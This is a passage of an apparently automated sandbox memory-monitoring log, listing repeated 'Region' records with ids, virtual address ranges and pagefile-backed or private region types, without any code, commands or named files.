region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20292 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20293 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20294 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20295 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20296 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20297 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20298 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20300 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20301 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20302 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20303 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20304 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20305 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20306 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20307 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20308 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20332 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20333 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20368 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20369 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20372 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20373 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20376 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20377 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20378 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20379 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20380 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20383 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20384 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20385 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20386 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20387 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20388 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20389 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20390 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20391 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20392 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20393 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20394 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20395 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20396 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20397 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20399 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20400 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20401 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20402 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20403 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20404 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20405 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20408 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20413 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20414 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20418 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20419 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20420 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20421 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20422 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20423 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20424 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20451 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20452 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20453 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20454 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20455 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 